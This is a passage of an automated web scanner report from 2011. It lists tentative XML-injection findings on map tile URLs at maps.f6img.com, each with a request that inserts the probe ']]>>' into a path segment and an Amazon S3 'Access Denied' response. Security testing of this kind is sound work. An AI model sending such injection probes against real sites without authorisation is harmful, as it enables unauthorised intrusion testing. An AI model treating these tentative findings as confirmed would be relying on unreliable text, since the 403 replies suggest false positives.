<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>821358FA1269FAEB</RequestId><HostId>K3h3ZkfMwrMReysxv0bcLfAsC58mxDchNsHjvFpBtFGGWH+59G
...[SNIP]...

8.232. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197048.png [REST URL parameter 5] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://maps.f6img.com
Path:	/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197048.png

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/venues/new-meadowlands-stadium/u2/v15]]>>/tiles/z19x154380y197048.png?1311100430733 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 82312AA4D6B24DDD
x-amz-id-2: uhAuEEHIvoWpnrh/y3sINMOTCJ5wXDNv5WfSRmc9g8JQ7ge0QATgAViDssnUcXlv
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:07 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: be9d42e0320d88aacff21226e65b3bd471927a9512807d275629a289deef550498171346a7a25005
Via: 1.0 2fa8d070c031e7b04698c494d003c248.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>82312AA4D6B24DDD</RequestId><HostId>uhAuEEHIvoWpnrh/y3sINMOTCJ5wXDNv5WfSRmc9g8JQ7ge0QA
...[SNIP]...

8.233. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197048.png [REST URL parameter 6] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://maps.f6img.com
Path:	/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197048.png

Issue detail

The REST URL parameter 6 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 6. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/venues/new-meadowlands-stadium/u2/v15/tiles]]>>/z19x154380y197048.png?1311100430733 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: A1ACA670B4163851
x-amz-id-2: zRr8rV6ejggdJ+Ms8/df7v6x0Ts7VA5aUchjZOlqT++0u3/A0n4JiJVYDxlr7zy1
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:08 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 164de0fc321c56833b4e7b641030d934912fd5090be2b7c95a926eae7e91663c291b83495732ab99
Via: 1.0 577026e4e1f5532985f9826096a733cd.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>A1ACA670B4163851</RequestId><HostId>zRr8rV6ejggdJ+Ms8/df7v6x0Ts7VA5aUchjZOlqT++0u3/A0n
...[SNIP]...

8.234. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197048.png [REST URL parameter 7] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://maps.f6img.com
Path:	/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197048.png

Issue detail

The REST URL parameter 7 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 7. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197048.png]]>>?1311100430733 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 37EC7380F6932A21
x-amz-id-2: FZs8KdTy0INQhipkYwEmNp+yD7GC5XfVRbCAI1KJsfDPvQz4I8VymJvMvdZAXwZE
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:10 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 666669857bd87c54893edeaf1bb268ca5f726d688987433422186c1ba369c5ba4d779761209f6a4c
Via: 1.0 4552622032e7495f9882a209f0041039.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>37EC7380F6932A21</RequestId><HostId>FZs8KdTy0INQhipkYwEmNp+yD7GC5XfVRbCAI1KJsfDPvQz4I8
...[SNIP]...

8.235. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197049.png [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://maps.f6img.com
Path:	/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197049.png

Issue detail

Request

GET /images]]>>/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197049.png?1311100430734 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 71FC5A8AB89E1392
x-amz-id-2: x67AwLXJBo0Uxh4jd9+pAKVPqX/RV00v1AGywOyJKATxA9NUe94dcdDMyFfR3WdW
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:50 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: f36b90eaf8c19a784b757a616d59e727ac64092312cc538dce91a1cd856bba6d05a88bf4bc85a6e5
Via: 1.0 d14fd6248e8744adca7a99428b205190.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>71FC5A8AB89E1392</RequestId><HostId>x67AwLXJBo0Uxh4jd9+pAKVPqX/RV00v1AGywOyJKATxA9NUe9
...[SNIP]...

8.236. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197049.png [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://maps.f6img.com
Path:	/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197049.png

Issue detail

Request

GET /images/venues]]>>/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197049.png?1311100430734 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: BA75D20F251D3313
x-amz-id-2: F1Qzp/B3uJDPcVtlTLCpgI0D9xJnBSbLItEtu4uCAoS2Y6mjz9E0XFCy01CYcAo5
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:53 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 1b27eb7bd6bbd3cc7ca2f949997cab04cb3e1365be008b28cd8caafe1d579ae188258fc3519c57d5
Via: 1.0 577026e4e1f5532985f9826096a733cd.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>BA75D20F251D3313</RequestId><HostId>F1Qzp/B3uJDPcVtlTLCpgI0D9xJnBSbLItEtu4uCAoS2Y6mjz9
...[SNIP]...

8.237. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197049.png [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://maps.f6img.com
Path:	/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197049.png

Issue detail

Request

GET /images/venues/new-meadowlands-stadium]]>>/u2/v15/tiles/z19x154380y197049.png?1311100430734 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: DDD7E314CE363AB0
x-amz-id-2: Irx4mVSe98b6OSb6VosVU3uzyH49+SLmgrPgMSDsItT6WBXsdzl7T0eehFQBEL3M
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:55 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 035621eeb7367c31231964e16f9b7ef7ca7f88388066f7951e534d0c962df80573bfb89cdfb3a9fa
Via: 1.0 d14fd6248e8744adca7a99428b205190.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>DDD7E314CE363AB0</RequestId><HostId>Irx4mVSe98b6OSb6VosVU3uzyH49+SLmgrPgMSDsItT6WBXsdz
...[SNIP]...

8.238. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197049.png [REST URL parameter 4] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://maps.f6img.com
Path:	/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197049.png

Issue detail

Request

GET /images/venues/new-meadowlands-stadium/u2]]>>/v15/tiles/z19x154380y197049.png?1311100430734 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 349324ED7D97395E
x-amz-id-2: KAzkdmch3XTWe/8tF42MRzxevfAxX+jO8T3mY+aZrvZxbYE04XH5iYRmfL1GzT+v
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:58 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: b5bd6396c4249fe46fe0d009a626b95b73c7175538e078d4eb86ab6bf927a76877b46382496eaf17
Via: 1.0 6759d8ab0529fa24d1eab1639129a687.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>349324ED7D97395E</RequestId><HostId>KAzkdmch3XTWe/8tF42MRzxevfAxX+jO8T3mY+aZrvZxbYE04X
...[SNIP]...

8.239. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197049.png [REST URL parameter 5] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://maps.f6img.com
Path:	/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197049.png

Issue detail

Request

GET /images/venues/new-meadowlands-stadium/u2/v15]]>>/tiles/z19x154380y197049.png?1311100430734 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 912FDC8C3899DDC1
x-amz-id-2: BRqaVDHEiMqgbxEYqMP1KCDQJhXNB+a1HngPNuMj41XcZvfmfBQmPJtZC8J+sxcm
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:02 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: d13b39e953e9b0bcd520389503da2b2a8ad507c4be48e3dabc3c8cf5fa05f37e632d982aa39b6c9e
Via: 1.0 577026e4e1f5532985f9826096a733cd.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>912FDC8C3899DDC1</RequestId><HostId>BRqaVDHEiMqgbxEYqMP1KCDQJhXNB+a1HngPNuMj41XcZvfmfB
...[SNIP]...

8.240. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197049.png [REST URL parameter 6] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://maps.f6img.com
Path:	/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197049.png

Issue detail

Request

GET /images/venues/new-meadowlands-stadium/u2/v15/tiles]]>>/z19x154380y197049.png?1311100430734 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 8662F874A765766D
x-amz-id-2: JPI3yZWhaYPmpnhWXars23IlpOATN8L7fUGskRGrk/6Zoetx76TxxO+ML0huvFxs
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:04 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 331fee311250467e0acb9557defaa9aca10c8f7695b128fb7412f5008a39aca82c9e270233c1a015
Via: 1.0 2fba667ca1ec01169aa22099159a4375.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>8662F874A765766D</RequestId><HostId>JPI3yZWhaYPmpnhWXars23IlpOATN8L7fUGskRGrk/6Zoetx76
...[SNIP]...

8.241. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197049.png [REST URL parameter 7] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://maps.f6img.com
Path:	/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197049.png

Issue detail

Request

GET /images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197049.png]]>>?1311100430734 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 8DA3D60F961DBCE8
x-amz-id-2: pqMkVwtP/F5O1QJSrIjeWV5OhsjVexwo+RvKtVVCTLKHIaTLP/OUDNw88FizsUii
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:07 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 064de28262c3d7c35b28c7884b28c57246f791b0214cb509e106219d0f1f64177f672b0b255a2ac9
Via: 1.0 2fba667ca1ec01169aa22099159a4375.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>8DA3D60F961DBCE8</RequestId><HostId>pqMkVwtP/F5O1QJSrIjeWV5OhsjVexwo+RvKtVVCTLKHIaTLP/
...[SNIP]...

8.242. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197048.png [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://maps.f6img.com
Path:	/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197048.png

Issue detail

Request

GET /images]]>>/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197048.png?1311100430733 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 02FE6D0DE0D6E128
x-amz-id-2: Oa6tE6PzO+N61PfX3mcZrFA6uw6kdgt9tagGGqKa/jY07HdScJ2Hdi9/qSZZ9fwu
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:53 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 0812c5f7891bad9edfb85f4f4df4d1ce393f6f8852789b5baac68de26a1de852075f14936438bd73
Via: 1.0 557f58686e107bfa2925cf3d6a17c717.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>02FE6D0DE0D6E128</RequestId><HostId>Oa6tE6PzO+N61PfX3mcZrFA6uw6kdgt9tagGGqKa/jY07HdScJ
...[SNIP]...

8.243. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197048.png [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://maps.f6img.com
Path:	/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197048.png

Issue detail

Request

GET /images/venues]]>>/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197048.png?1311100430733 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 55CD14F25FA5F1B5
x-amz-id-2: RxtgB3UBiNchAeEXxhXTil1hHyj92gbyQD6o3o2XU6E64Q7F+A384AkGer3Amr5U
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:56 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 35fd6a238ebf0e2496977e90178ac91ab74f8b0c4902cd83bf621aa7039cc4d567e34508f37fa0d0
Via: 1.0 d14fd6248e8744adca7a99428b205190.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>55CD14F25FA5F1B5</RequestId><HostId>RxtgB3UBiNchAeEXxhXTil1hHyj92gbyQD6o3o2XU6E64Q7F+A
...[SNIP]...

8.244. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197048.png [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://maps.f6img.com
Path:	/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197048.png

Issue detail

Request

GET /images/venues/new-meadowlands-stadium]]>>/u2/v15/tiles/z19x154381y197048.png?1311100430733 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: FA340FB588BC2004
x-amz-id-2: tECr+Gt7YHZ6fFhgaRUQe30XOuMb6CzbRTcpj3Ilgq3rd7O6RaqSlITYr2P/xM/C
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:00 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: f6d5f921350574558832e2d0fe2197e619764ddcc5566b6b597f62380be0e78d763e430bec7553e2
Via: 1.0 e1f0363dccfdcada535eb4fd7c2d2e27.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>FA340FB588BC2004</RequestId><HostId>tECr+Gt7YHZ6fFhgaRUQe30XOuMb6CzbRTcpj3Ilgq3rd7O6Ra
...[SNIP]...

8.245. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197048.png [REST URL parameter 4] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://maps.f6img.com
Path:	/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197048.png

Issue detail

Request

GET /images/venues/new-meadowlands-stadium/u2]]>>/v15/tiles/z19x154381y197048.png?1311100430733 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 231C5BAEDDBB8442
x-amz-id-2: F+wwWY3cv+6hv+uCP13/ENtEN5lX7CVvWMD7YcTb+PJLr3qMszpWSpSwHO0PgZOu
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:02 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 24fb5237983cc35c4741d6e71bc0a6e007b4a10283fc033eca3000cf60c22a046fd2a6cf22c69100
Via: 1.0 b211469d843c22c59dc668f60ed60542.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>231C5BAEDDBB8442</RequestId><HostId>F+wwWY3cv+6hv+uCP13/ENtEN5lX7CVvWMD7YcTb+PJLr3qMsz
...[SNIP]...

8.246. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197048.png [REST URL parameter 5] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://maps.f6img.com
Path:	/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197048.png

Issue detail

Request

GET /images/venues/new-meadowlands-stadium/u2/v15]]>>/tiles/z19x154381y197048.png?1311100430733 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: CD2056B39ACDE483
x-amz-id-2: ePsmkPyOfmNZ10+JnQWgMe0BOebaX/5OweUx9qws6nVembppt1um4eltkHZjvgeo
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:04 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
